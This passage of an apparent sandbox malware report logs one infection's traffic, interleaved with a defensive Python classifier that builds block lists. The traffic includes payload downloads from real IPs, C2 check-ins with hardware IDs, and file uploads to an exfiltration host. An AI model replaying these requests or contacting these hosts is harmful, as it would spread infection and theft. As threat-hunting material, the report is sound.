Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 38 37 43 45 39 36 45 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 2d 2d 0d 0a Data Ascii: ------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="hwid"DA87CE96ED213859137049------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="build"mars------BFIJEHCBAKFCAKFHCGDG--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 66119Content-Type: multipart/form-data; boundary=------------------------Uns2ElJSnWdBtWLXC3zBG4Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 55 6e 73 32 45 6c 4a 53 6e 57 64 42 74 57 4c 58 43 33 7a 42 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 61 64 65 62 69 68 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a b9 bf ea 06 f7 47 fc cd 0c be f2 e0 18 3b af 83 a9 d6 1f 24 1b e4 5d e2 87 1a 64 3d 81 d7 f9 5b 30 3f 9d 45 8f 00 49 9d 22 12 1b e6 0d 47 79 73 57 6f d2 1d 87 c5 d2 d4 25 41 4e 9e cf 7b 13 55 f5 6d a2 29 e3 f2 2a 80 ec da 0a 06 5f 21 10 8b 6f 80 a4 36 12 50 67 e1 75 55 28 4a 83 9c 62 e0 cf 64 77 ac 86 e1 fe c7 93 14 07 ff f3 e8 6a 8f 13 38 8c 46 61 de d7 b7 a0 56 54 92 5e 39 0e fe f4 8e 56 ef 2c 8f 5e da 35 8c ea 5a f4 81 95 01 7f 74 3c de 82 09 1d 53 06 e8 ae 20 07 e7 87 7a af 85 f8 b3 b2 fb e9 6d 1f e5 1f 43 b1 6c c2 a0 89 94 03 3b 82 67 32 3d d8 91 e3 94 2c a3 6a 4f 03 51 da b8 7e c6 ad d9 d3 d7 02 62 6c 9a 23 07 ad a4 17 68 1f b0 70 4a d3 06 7f 16 18 ad 71 7f 90 6f 5b d5 c6 b4 46 d6 d8 18 e9 a5 2a 0e 2c 66 c0 3d 1b 0e 74 e4 38 d3 26 12 2a 42 cd d4 2d ba 61 83 7c a2 11 e7 1c e0 0e 94 d3 a9 d6 54 25 27 fd 35 50 4a 71 c1 18 c5 ea 07 e8 7d 79 be 2c da a7 c8 a5 ab e7 64 81 ed 0e 23 a9 ed 5e f8 04 90 41 6e 50 98 47 00 06 93 13 84 bf 83 c4 e5 3c 29 08 fd a5 67 5b 59 68 c0 90 36 09 19 b4 e2 13 ce a2 12 fe 74 41 ed e7 36 09 d7 da 6c f1 9e 47 9f 1c 6e 19 62 fc 5e 6c d8 e4 ab cf 8a 36 93 c0 18 c4 ab 77 02 1f c9 2d 90 43 0b 70 99 78 3f 14 2e 90 c4 fd 2c ac 1b 8d c2 a1 d0 96 1e 8e cf b9 ef 83 11 e8 0d 0d 7d 4b 33 43 d0 c0 82 6a df d6 7d 8f 96 ca 69 d7 60 93 03 17 29 9c 72 a5 b6 
c0 c3 f7 f6 a3 6e e5 2d 0b b7 d7 9a 24 c6 a6 5d e8 30 e1 ee 55 c4 68 86 bc a6 ed 10 fc ce 42 e1 1a c3 cf 81 a8 63 6c fd 64 c0 aa 28 9e 10 0f 26 5b 2d 19 94 68 6a 0f d8 f8 db 4d e8 fa a2 e9 c1 0b 16 00 e5 c2 bf 19 c9 ff 07 a6 29 a5 71 f3 a4 28 35 91 a6 0c 41 65 70 c4 2d e7 fa f3 41 9d e0 a8 12 07 86 43 0a a6 69 70 a1 a1 29 49 65 e4 8f 96 97 93 c9 7b 01 2b ae a3 a6 86 75 20 ce ee d9 07 00 82 d0 d0 90 a2 a1 68 4c d5 05 77 cb 9a c0 b9 64 af 59 81 2a 75 e6 b0 37 e7 4a 7c 47 36 f9 f0 91 79 1e d3 35 13 ea 14 6e 47 83 5c 1f 98 29 3f cb f9 4c ea 1a ae 9a a3 96 36 ca 27 6b 83 e2 75 b2 af 77 87 6d cc fe 08 7f 0f 75 64 f6 c0 39 c7 d5 a7 e7 6f 34 2e e1 94 f6 64 d7 c8 f8 99 50 4d d0 ee 00 73 cc 95 38 99 e3 07 4f 43 8e 8c 2b 77 90 55 76 44 97 6d ed 22 10 1c 8a a7 62 b9 17 5b d1 66 97 6e 39 01 dc 19 63 2c 9f d2 61 5b e2 8b b6 5b 0a 2d 89 cc a0 63 fb 84 26 7b 1d 92 b0 2e 98 41 88 b3 3a 05 06 6d 5d 15 a4 b9 a0 86 11 25 bf 1a 29 d9 e3 bf ea 2e fe ac ea 95 02 8d 29 fc 9b 29 18 be d4 04 67 02 46 3e 6b a9 08 01 89 3c b3 f1 38 52 0f 61 44 c3 ed
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007747001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAEHDBFIDAFIDHJEBFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 38 37 43 45 39 36 45 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 2d 2d 0d 0a Data Ascii: ------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="hwid"DA87CE96ED213859137049------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="build"mars------BAAEHDBFIDAFIDHJEBFB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 37 37 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1007748001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27554Content-Type: multipart/form-data; boundary=------------------------4OjR0bBU5kAiBEmf5D72UwData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 4f 6a 52 30 62 42 55 35 6b 41 69 42 45 6d 66 35 44 37 32 55 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 75 74 6f 73 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d6 f9 dd 56 d1 63 7c d5 de b9 5f 4a dc e5 23 0a 8a cc 61 cb ed 15 1b 96 8c 80 3e 1b dd cf 5f b8 bf f9 df c3 14 95 49 e6 ae d5 f8 ff f9 48 95 52 f1 cd 8b c4 f6 e3 a8 4f ed 29 52 04 51 53 ea ac 7d 30 a6 eb 7b 9d 96 55 b0 ff 04 02 ff 91 70 ad 6c f0 6c 04 d5 4c 70 4b d9 cf 11 c8 17 e2 bc ea 58 2c 1d 50 9b 85 f0 af 0f 12 60 3b 87 03 ef d7 a8 cf 37 30 0e a7 de 1e 55 e2 cc 79 df 10 20 8f f4 b6 80 3c a4 df 54 09 46 93 df c4 90 e9 af f4 25 0b 09 a6 9a 6b 27 70 bb 58 57 e0 f6 5a 74 63 66 9f 4f 97 58 0b e2 ea 91 b0 68 51 a6 55 3e ab e9 ed db f3 a3 fc ba 7e 74 cd ba 06 62 33 04 ba 9a 29 8c f0 cb be a5 c8 4c 72 c3 98 4e fa c7 44 4c b6 3f 4a 80 49 eb 7b 6d 85 fc c8 50 92 48 ee c1 b6 c8 90 91 33 60 92 6f 15 31 3b d3 88 67 a9 7b 88 49 fa 8c 6b e1 fe b6 ad b9 13 03 34 3e 74 8b 92 0b 43 06 ee ca 57 9a 63 4c 9e a4 f8 4d 70 35 48 17 83 2f eb 4a 4e 83 54 5a 66 1b 55 36 8f ab cf 00 ce 38 9d bf 81 e9 d4 c2 a8 4b 3a ec f0 6f f2 b9 a2 a6 21 47 6b 20 2d b3 49 c8 db bf e0 86 41 be cb f8 5f f5 80 8f 88 d0 b2 ea f2 88 36 87 c9 14 88 13 98 b3 55 42 c0 05 80 46 81 0e 28 8d 33 11 a8 2c 8b f3 47 db 1a af 36 0a 06 51 eb e4 dd c4 cd e8 95 01 77 34 ea 3b 98 5f ed 21 87 e9 b8 4b aa a5 29 3e c9 20 c0 3b 59 2c 4f 15 8c d8 43 f3 85 89 1a 64 7e 9a c3 b9 b6 46 b1 62 7c 22 1e c7 e6 0b 7d c8 b2 2f 99 cd d1 f4 aa 63 
94 5c 61 a3 97 11 57 44 11 c2 d4 ab 37 41 0a be 11 58 42 77 08 b0 7d 75 cd 8a 9a 27 6e b9 1f 98 72 a6 64 88 d9 39 51 2d 40 6b 86 ee ac cf 55 4b 07 1c 09 4b 3d 5b 49 f6 82 1d af 6a e8 c3 31 d8 0f c6 1c 6e 3b b3 15 b9 78 75 2f 73 a8 03 93 17 9e 39 62 4d c6 ca 71 4d 28 b9 c0 8a ce 4e 7b a8 11 ed 12 a3 64 89 e8 c7 66 26 45 3f 5f 11 de 38 a8 f5 6f 84 21 5c 2c cc 27 d9 9c 4b b0 52 c9 ac 95 8d 81 5f 95 49 88 20 b0 8d c0 69 46 15 55 d0 57 00 35 02 08 6b 49 99 95 eb 50 d5 aa 5c d3 3c c4 ca 35 e2 2d e4 e7 90 5d 7b 96 ac cb e7 ac bd 25 cd f2 0d 9d e8 89 32 42 88 b9 32 4a f2 8d 18 40 5b 75 b2 7c 7d 97 f2 ee 46 e1 a9 33 d5 e0 a2 cf 14 03 df 5b d5 34 5a ad f7 18 c3 fd ce 5d 2d b1 d2 77 ef ee a6 94 7c 2e 90 f6 54 41 96 be 6e 4c b8 38 95 4c b9 8a f9 98 69 b6 2a 8b 9a 26 86 3c 1c 04 9a 29 cf 27 17 50 3c 84 7d 0e 7c a0 3e a9 72 fb 4b e4 72 11 7c 18 3b 77 99 49 43 51 57 f5 8c 6a 51 b6 89 59 d5 63 c9 28 91 51 d3 6e c9 e8 90 f3 8e 72 ab dc 29 c3 4a 16 6f 6a 3d fc 99 4d ab 7d 4d 34 f1 09 c4 f8 27 12 96 c7 20 e2 c3 20 9f e7 01 bf e6 32 1b 4b 64
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 38 37 43 45 39 36 45 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="hwid"DA87CE96ED213859137049------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="build"mars------AFIEGCAECGCAEBFHDHIE--
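Three request shapes recur in the traffic above: urlencoded POSTs to /Zu7JuNko/index.php on 185.215.113.43 carrying st=s, r=&lt;152 uppercase hex chars&gt; or d1=&lt;number&gt;&amp;unit=&lt;number&gt; (d1 advances by 1000 after each payload download while unit stays fixed); multipart POSTs to /c4becf79229cb002.php on 185.215.113.206 with exactly two fields, hwid and build=mars; and multipart file uploads of *.bin to /v1/upload.php on fvtekk5pn.top, interleaved with plain GETs for *.exe from bare IPs. The following added example, not Joe Sandbox code, reconstructs those requests from the report's Data Ascii fields and classifies them by shape, extracting the identifiers the bots send. Labels name the request shape only; which family owns which endpoint is left to the report's configuration section. The encrypted upload payload is replaced by constructed filler bytes, and the multipart reader handles only what these bots send.

```python
"""Request-shape classifier for the C2 traffic above (added example, not
Joe Sandbox code).  Bodies are reconstructed from the report's Data Ascii
fields; the upload payload is constructed filler."""
from dataclasses import dataclass
import re
from urllib.parse import parse_qs


@dataclass
class Request:
    method: str
    host: str
    path: str
    content_type: str = ""
    body: bytes = b""


def parse_multipart(body: bytes, content_type: str) -> dict[str, bytes]:
    """Minimal multipart/form-data reader: {name: value}; a file part is
    keyed 'file:<filename>'.  Handles only the shapes seen in this report."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        return {}
    delim = b"--" + m.group(2).encode()
    parts: dict[str, bytes] = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):                  # closing delimiter
            break
        head, _, value = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'[ ;]name="([^"]*)"', head)   # not 'filename='
        if not name:
            continue
        key = name.group(1).decode()
        fname = re.search(rb'filename="([^"]*)"', head)
        if fname:
            key = "file:" + fname.group(1).decode()
        # The CRLF before the next delimiter belongs to the delimiter.
        parts[key] = value[:-2] if value.endswith(b"\r\n") else value
    return parts


def classify(req: Request) -> dict:
    """Describe one request: its shape, the URL to block, extracted fields."""
    ioc = f"{req.method} http://{req.host}{req.path}"
    ctype = req.content_type.lower()
    if req.method == "GET" and req.path.lower().endswith(".exe"):
        return {"kind": "payload-download", "ioc": ioc}
    if req.method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        form = {k: v[0] for k, v in parse_qs(req.body.decode("latin-1")).items()}
        if "st" in form:
            stage = "st-flag"
        elif "r" in form and re.fullmatch(r"[0-9A-F]+", form["r"]):
            stage = "r-hexblob"
        elif {"d1", "unit"} <= form.keys():
            stage = "d1-unit-counter"
        else:
            stage = "unknown"
        return {"kind": "form-checkin", "stage": stage, "ioc": ioc, "fields": form}
    if req.method == "POST" and ctype.startswith("multipart/form-data"):
        parts = parse_multipart(req.body, req.content_type)
        files = [k[5:] for k in parts if k.startswith("file:")]
        if files:
            size = sum(len(parts["file:" + f]) for f in files)
            return {"kind": "file-upload", "ioc": ioc, "filenames": files, "bytes": size}
        if {"hwid", "build"} <= parts.keys():
            return {"kind": "hwid-build-checkin", "ioc": ioc,
                    "hwid": parts["hwid"].decode(), "build": parts["build"].decode()}
        return {"kind": "multipart-other", "ioc": ioc, "fields": sorted(parts)}
    return {"kind": "other", "ioc": ioc}


def triage(requests: list[Request]) -> list[dict]:
    return [classify(r) for r in requests]


def blocklist(requests: list[Request]) -> list[str]:
    """Distinct hosts contacted, for a firewall or DNS block list."""
    return sorted({r.host for r in requests})


# Boundaries as they appear in the report's Content-Type headers.
SB = "----BFIJEHCBAKFCAKFHCGDG"
CB = "-" * 24 + "dOjK09zs8QI4YHDEtGX82b"
SBD, CBD = b"--" + SB.encode(), b"--" + CB.encode()
FILLER = bytes(range(16))                 # constructed stand-in for the blob
URLENC = "application/x-www-form-urlencoded"

SAMPLES = [
    Request("POST", "185.215.113.43", "/Zu7JuNko/index.php", URLENC, b"st=s"),
    Request("POST", "185.215.113.43", "/Zu7JuNko/index.php", URLENC,
            b"r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D4"
            b"6450FC9DDF642E3BDD70A78B62E76B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F"),
    Request("POST", "185.215.113.43", "/Zu7JuNko/index.php", URLENC,
            b"d1=1007743001&unit=246122658369"),
    Request("GET", "31.41.244.11", "/files/Lumma111.exe"),
    Request("POST", "185.215.113.206", "/c4becf79229cb002.php",
            f"multipart/form-data; boundary={SB}",
            SBD + b'\r\nContent-Disposition: form-data; name="hwid"\r\n\r\nDA87CE96ED213859137049\r\n'
            + SBD + b'\r\nContent-Disposition: form-data; name="build"\r\n\r\nmars\r\n'
            + SBD + b"--\r\n"),
    Request("POST", "fvtekk5pn.top", "/v1/upload.php",
            f"multipart/form-data; boundary={CB}",
            CBD + b'\r\nContent-Disposition: form-data; name="file"; filename="Likaqila.bin"\r\n'
            b"Content-Type: application/octet-stream\r\n\r\n" + FILLER + b"\r\n" + CBD + b"--\r\n"),
]

if __name__ == "__main__":
    for r in triage(SAMPLES):
        print(r)
    print("block:", blocklist(SAMPLES))
```

The hwid value (DA87CE96ED213859137049) and the unit value (246122658369) are stable across every check-in in the capture, so they are the fields worth pivoting on when hunting for the same victim across multiple reports; the boundary strings and d1 counter change from request to request and are not useful as indicators.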
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 172.67.155.248 172.67.155.248
Source: Joe Sandbox View IP Address: 104.21.85.146 104.21.85.146
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL (listed twice)
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49805 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49806 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49811 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49820 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49827 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49825 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49832 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49837 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49845 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49847 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49851 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49858 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49863 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49868 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49875 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49887 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49891 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49897 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49905 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49936 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49895 -> 172.67.155.248:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43 (reported 10 times)
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000ABE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_000ABE30
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /files/Lumma111.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://pubads.g.doubleclick.net/gampad/*ad-blk**://pubads.g.doubleclick.net/gampad/*xml_vmap1**://vast.adsafeprotected.com/vast**://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etp*://ads.stickyadstv.com/auto-user-sync**://*.adsafeprotected.com/*/Serving/**://*.adsafeprotected.com/jload?**://securepubads.g.doubleclick.net/gampad/*ad**://*.adsafeprotected.com/jsvid?**://trends.google.com/trends/embed*--panel-banner-item-info-icon-bgcolor*://track.adform.net/Serving/TrackPoint/**://pixel.advertising.com/firefox-etp*://pubads.g.doubleclick.net/gampad/*xml_vmap2**://ads.stickyadstv.com/user-matching**://*.adsafeprotected.com/*/imp/*extensions.geckoProfiler.acceptedExtensionIds equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002E.00000002.3113524727.0000020877B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
